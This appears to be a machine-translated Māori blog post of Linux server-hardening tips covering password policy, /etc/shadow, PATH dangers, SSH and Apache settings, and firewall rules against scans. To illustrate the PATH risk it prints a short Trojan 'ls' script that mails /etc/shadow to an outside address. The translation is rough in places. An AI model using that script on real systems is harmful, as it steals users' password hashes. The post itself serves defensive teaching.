Tohu Awhina mo to Linux (Tūmau) (Wahanga 1)

@Jlcmux | | GNU / Linux, Whatunga / Tuuturu

1 Korero

Kaore au i whakaputa i tetahi mea i runga i te tuhinga roa mo te wa roa a ka hiahia ahau ki te whakaatu ki a koe i etahi tohutohu i tangohia mai i tetahi pukapuka, (I roto i etahi atu). I kitea e au i te Whare Wananga a ka panuihia e au ahakoa he pono he tawhito me nga tikanga e whakaatuhia ana kaore pea e pai ki te mahi na te whanaketanga o te punaha, he ahuatanga pai ano hoki hei whakaatu. 9788448140502

Kei te hiahia ahau ki te whakamaarama ko enei nga tohutohu e whai kiko ana ki te punaha Linux e whakamahia ana hei kaiwhakarato, i runga i te reo, i te waahanga nui ranei pea i whakawhiwhia ki te taumata kaiwhakamahi papamahi, ahakoa ka taea te whakamahi, kaore e tino whai hua.

Kei te whakatupato ano ahau he korero ngawari noa iho enei, aa kaore au e paku korero, ahakoa kei te whakaaro ahau ki te mahi i tetahi atu tuhinga tino kiko me te whanui mo tetahi kaupapa. Engari ka kite ahau i muri. Kia tiimata.

Kaupapahere Kupuhipa. 

Ahakoa te ahua o te rerenga kapi, ma te whai kaupapa here kupuhipa pai ka rerekee te rereketanga o te punaha whakaraerae kaore ranei. Ko nga whakaeke penei i te "brute force" ka whakamahi i te kore he kupuhipa kino ki te whakauru ki tetahi punaha. Ko nga tohutohu noa ake ko:

  • Whakakotahitia te pūmatua me te iti
  • Whakamahia nga kiripuaki motuhake.
  • Nga Nama.
  • Neke atu i te 6 mati (ko te tumanako neke atu i te 8).

Hei taapiri atu ki tenei, kia whakaaroarohia e rua nga konae nui.  / etc / passwd me / etc / atarangi.

Ko tetahi mea nui ko te konae / etc / passwd. Hei taapiri ki te homai ki a maatau te ingoa o te kaiwhakamahi, tona uid, ara kōpaki, bash .. etc. i etahi waa ka whakaatu hoki i te kī whakamunahia a te kaiwhakamahi.

 Me titiro e tatou tona hanganga totika.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

kaiwhakamahi: cryptkey: uid: gid: ara :: ara: bash

Ko te raru i konei, ko nga mana a tenei konae Rw-r - r– te tikanga kua panuihia e ia nga whakaaetanga mo nga kaiwhakamahi katoa o te punaha. me te kii i te ki whakamuna kaore i te tino uaua ki te whakamaarama i te tino.

Koina te take kei kona te konae / etc / atarangi. Koinei te konae kei te penapena nga taviri kaiwhakamahi katoa, me etahi atu mea. Kei i tenei konae nga mana e tika ana kia kore e taea e tetahi kaiwhakamahi te paanui.

Hei whakatika i tenei, me haere ki te konae / etc / passwd ka huri i te kī whakamuna ki te "x", ka penapena noa iho te ki i ta maatau konae / etc / atarangi.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Nga raru o te PATH me te .bashrc me etahi atu.

Ka mahia ana e te kaiwhakamahi he whakahau ki runga i a raatau papatohu, ka tirohia e te anga tena tohu ki roto i te raarangi raarangi kei roto i te taurangi taiao PATH.

Mena ka patohia e koe te "tangi $ PATH" ki te papatohu ka puta he mea penei.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Ko ia kōpaki te wahi e rapu ai te anga mo te whakahau kua tuhia kia mahia. Ko ia "." te tikanga ko te kōpaki tuatahi ki te rapu he kōpaki kotahi mai i reira e mahia ana te whakahau.

Whakaarohia he kaiwhakamahi "Carlos" ana ka hiahia tenei kaiwhakamahi ki te "mahi kino." Ka taea e tenei kaiwhakamahi te waiho i tetahi konae "ls" ki tana kōpaki matua, ana kei tenei konae te whakahau penei:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Ana mena ko te kaiwhakamahi pakiaka mo nga mea o te haerenga, ka ngana ki te whakararangi i nga kopaki ki roto i te kopaki whakairinga (i te mea i te tuatahi te tirotiro mo te whakahau i roto i taua kopae, ma te pohehe ka tukuna te konae me nga kupuhipa ki tenei imeera ka peena nga kōpaki a e kore ia e mohio tae noa ki te mutunga o te ra.

Hei karo i tena me whakakore e tatou te "." o te taurangi PATH.

Waihoki ko nga konae penei i te /.bashrc, /.bashrc_profile, ./.login me arotake ka tirohia kaore he "." i roto i te taurangi PATH, me te pono mai i nga konae penei i tenei, ka taea e koe te whakarereke i te waahi o tetahi whakahau motuhake.

He tohutohu me nga ratonga:

SHH

  • Monokia te putanga 1 o te kawa ssh ki te konae sshd_config.
  • Kaua e tukua te kaiwhakamahi pakiaka ki te takiuru ma te ssh.
  • Ko nga konae me nga kōpaki ssh_host_key, ssh_host_dsa_key me ssh_host_rsa_key me tatau noa e te kaiwhakamahi pakiaka.

Tuhinga

  • Hurihia te panui powhiri i te konae ingoa.conf kia kore e whakaatu i te nama putanga
  • Whakawhitihia nga whakawhitinga rohe, ka taea noa ma nga roopu e hiahia ana.

Apache

  • Aukatia te ratonga mai i te whakaatu i to putanga ki te kupu powhiri. Whakatikahia te konae httpd.conf ka taapiri, ka whakarereke ranei i nga raina:  

ServerSignature Off
ServerTokens Prod

  • Monokia te taatai ​​aunoa
  • Whirihorahia te apache kia kaua e tuku i nga konae ngawari penei i te .htacces, * .inc, * .jsp .. etc.
  • Tangohia nga whaarangi tangata tauira ranei mai i te ratonga
  • Whakahaerehia te apache i roto i te taiao koretake

Haumarutanga Whatunga.

He mea nui kia kapi katoa nga urunga ka taea ki to punaha mai i te whatunga o-waho, anei etahi tohu awhina kia kore ai e uru mai nga kaiwhai ki te matawai me te whiwhi korero mai i to hononga.

Poraka te hokohoko a ICMP

Me whirihora te papangaahi hei aukati i nga mahinga ICMP taumai me nga putanga katoa me nga whakautu aoro. Ma tenei ka karohia e koe, hei tauira, ka kitea koe e te matawai e rapu ana i nga taputapu ora i roto i te waahi IP. 

Aukati i te TCP ping scan.

Ko tetahi huarahi ki te matawai i to punaha ko te TCP ping scan. Whakaarohia kei runga i to kaiwhakarato he server Apache kei te tauranga 80. Ka ahei te tangata whakauru ki te tuku tono ACK ki taua tauranga. Ma tenei, mena ka whakautu te punaha, ka ora te rorohiko ka matawai i era atu tauranga.

Mo tenei, me waiho tonu i to pātūahi te "whakaaro ki te kaute" me te karo i nga kete ACK katoa kaore e rite ki te hononga TCP kua oti ke ranei, ki tana waahi ranei.

Sometahi tohutohu tāpiri:

  • Whakamahia nga punaha IDS kia kitea nga tirotiro tauranga ki to whatunga.
  • Whirihorahia te Pātūahi kia kore ai e whakawhirinaki ki nga tautuhinga tauranga puna hononga.

Na te mea ko etahi tirotiro ka whakamahi i te tauranga puna rūpahu pēnei i te 20 me te 53, nā te mea he maha nga punaha e whirinaki ana ki enei tauranga na te mea he ahuatanga ki te ftp, ki te DNS ranei.

FAKATOKANGA: Kia mahara ko te nuinga o nga raru e whakaaturia ana i tenei pou kua oti ke te whakatau i nga tohatoha o naianei. Engari kaore rawa e raru te whai korero matua mo enei awangawanga kia kore ai e pa ki a koe.

FAKATOKANGA: A muri ake nei ka kite ahau i tetahi kaupapa motuhake ka mahi ahau i tetahi pou me nga korero taipitopito me nga korero o tenei wa.

Thaks katoa mo te panui.

Mauruuru.


Ko nga korero o te tuhinga e piri ana ki o maatau kaupapa o matatika whakatika. Ki te ripoata i tetahi paatene paato Here.

He korero, waiho i a koe

Waiho to korero

Ka kore e whakaputaina tō wāhitau īmēra.

*

*

  1. He kawenga mo nga raraunga: Miguel Ángel Gatón
  2. Te kaupapa o te raraunga: Whakahaerehia te SPAM, te whakahaere korero.
  3. Ture: To whakaae
  4. Whakawhitinga korero: Kaore nga korero e tukuna ki nga taha tuatoru engari ma te ture herenga.
  5. Rokiroki raraunga: Paetukutuku e whakahaerehia ana e Occentus Networks (EU)
  6. Tika: I nga wa katoa ka taea e koe te whakaiti, te whakaora me te muku i o korero.

  1.   kōrero ka mea
    hanga 6 tau

    He tino pai ki ahau te tuhinga, ana te hiahia ki tenei kaupapa, kei te akiaki ahau kia tuku tonu i nga korero.

    Whakautu ki te informatico